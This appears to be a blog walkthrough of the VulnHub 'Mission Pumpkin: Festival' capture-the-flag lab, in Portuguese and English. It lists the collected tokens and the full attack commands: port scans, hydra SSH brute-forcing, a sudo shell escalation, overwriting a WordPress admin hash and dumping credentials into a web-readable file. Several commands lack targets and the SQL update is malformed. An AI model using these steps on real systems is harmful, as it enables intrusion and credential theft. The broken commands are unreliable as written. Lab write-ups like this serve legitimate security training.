VulnHub Mission Pumpkin v1.0 (3/3): Festival (Walkthrough)

O que sabemos?

In this level (Level 3) it is time for Pumpkin Festival, the goal is to reach root and access PumpkinFestival_Ticket and collect PumpkinTokens on the way.

Reconhecimento / Enumeração de Vulnerabilidades

This machine is up and running at
nmap -A -T4 -p-
21/tcp   open  ftp     vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6880/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13

Análise do Serviço FTP (porta 21)

ftp 21
Token 1 (FTP:secret/token.txt)
PumpkinToken : 2d6dbbae84d724409606eddd9dd71265

Análise do serviço HTTP (porta 80)

Token 2 (HTTP:index.html)
PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52
Possíveis usuários:
- Harry (harry)
- Jack (jack)
echo -e "harry\njack" > usuários.txt

Buscando por arquivos e diretórios (HTTP na porta 80)

Token 3 (HTTP:Wordpress Home:pumpkins.local)
PumpkinToken : 06c3eb12ef2389e2752335beccfb2080
gobuster dir -u -x php,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch -u -x 403,404,500 -e php,html,txt,jpg,gif,png,zip,tar,gz,gpg,pem -rR 5 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Token 4 (HTTP:/tokens/token.txt)
PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea

Análise do CMS Wordpress (pumpkins.local)

wpscan --url http://pumpkins.local/ --enumerate at,ap,u
Token 5(HTTP:Wordpress:/license.txt)
PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71

Decodando BaseN


Acessando o CMS Wordpress

Token 6 (HTTP:Wordpress:/user:morse/profile.php)
PumpkinToken : 7139e925fd43618653e51f820bc6201b

Análise do SSH (porta 6880)

Usuário: jack
Senha: Ug0t!TrIpyJ
ssh jack@pumpkins.local -p 6880
hydra -e nsr -L usuários.txt -P /usr/share/wordlists/rockyou.txt pumpkins.local ssh -s 6880 -I -F
A opção “-e nsr” testa como “possível senha”, as variações nos nomes de usuários.
nmap -sV -p6880 --script ssh-auth-methods.nse pumpkins.local

Acesso via FTP (porta 21)

hydra -e nsr -L usuários.txt -P /usr/share/wordlists/rockyou.txt pumpkins.local ssh -s 6880 -I -F
Usuário: harry
Senha: yrrah
Token 7 (FTP:/home/harry/token.txt)
PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e
Token 8 (FTP:/home/harry/Donotopen/NO/NOO/NOOO/NOOOO/token.txt)
PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c
file data.txt
data.txt: POSIX tar archive
cat jack | xxd -r -p

Acesso via SSH (porta 6880)

cat jack | xxd -r -p > /root/.ssh/id_rsa
ssh jack@pumpkins.local -p 6880

Corrigindo permissões

useradd --no-create-home --no-user-group --shell=/bin/false jack
chown jack /root/.ssh/id_rsa
userdel --remove --force jack

Escalação de Privilégios

Token 9 (SSH:/home/jack/token)
PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706
sudo -l
mkdir /home/jack/pumpkins
echo "/bin/sh -i" > /home/jack/pumpkins/alohomora
chmod +x ~/pumpkins/alohomora
sudo ~/pumpkins/alohomora

Em busca do último token

Acessando a conta “admin” (Método 1: Wordlist)

cewl -w wordlistPumpkin.txt
wpscan -U admin -P wordlistPumpkin.txt --url http://pumpkins.local/
for i in $(cat wordlistPumpkin.txt); do grep $i /usr/share/wordlists/rockyou.txt | grep -x '.\{4,15\}' >> wordlistPumpkin.txt; uniq wordlistPumpkin.txt | sort -o wordlistPumpkin.txt; done
Novo arquivo criado com 322.693 strings (anteriormente eram apenas 36)
wpscan -U admin -P wordlistPumpkin.txt --url http://pumpkins.local/

Acessando a conta “admin” (Método 2: Update DB)

ls /etc/apache2/sites-available/
cat /etc/apache2/sites-available/web.conf
ls /home/web/*.php -lh
mysql -uroot -p
Enter password: root
show databases;
use pumpkins;
show tables;
describe wp_users;
select user_login,user_pass from wp_users;
update wp_users
user_pass = '$P$BCvOKficMcCyBtPxjoiM8S8SFBfWUj1'
user_login = 'admin';

Acessando a conta “admin” (Método 3: Export DB Login/Pass Hash)

select concat_ws(':', user_login, user_pass) as 'Pumpkins User/Pass Wordpress' from wp_users;
select concat_ws(':', user_login, user_pass) from wp_users into outfile '/home/web/wp-content/uploads/credenciais.txt';

Lendo o último Token

Token 10(HTTP:Wordpress/user admin:/wp-admin/post.php)
PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4

Considerações finais




Cybersecurity & IT Consultant, Pentester and Writer. Loves: Computer Networking, Programming and Hacking!!

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
André Henrique

André Henrique

Cybersecurity & IT Consultant, Pentester and Writer. Loves: Computer Networking, Programming and Hacking!!

More from Medium

TryHackMe: Conti Walkthrough

Basic_Pentesting_1 VulnHub


TryHackMe : RootMe CTF Writeup (Detailed) | Samirul Haque | @iamsamirhq | tryhackme | rootme